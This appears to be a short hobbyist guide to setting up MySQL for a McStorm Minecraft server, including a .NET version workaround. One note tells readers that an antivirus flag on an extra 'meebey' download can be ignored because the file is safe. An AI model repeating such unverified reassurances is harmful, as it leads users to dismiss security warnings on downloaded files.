Installing the Mysql is not required to run a McStorm server, but is necessary if at anytime in-game you want to use portals, zoning, and the /about command; An extremely useful tool to stop griefers.

NOTE* As of 7/25/11 you may be prompted to download an additional meebey file. This is crucial to running Mcstorm but your antivirus may flag it as unsafe (don't worry, it really is safe.)

BE AWARE* If you are having issues setting up MySql, it may be the fact that you're using Microsoft .Net Framework 4.0. Uninstall and replace it with .Net Framework 3.5, and you may or may not have better luck.

The Mysql set up shown in this video is not the usual Mysql installation everyone else uses. It is an alternate portal method (offered by Mclawl) that works just as well and does not require you to install anything.
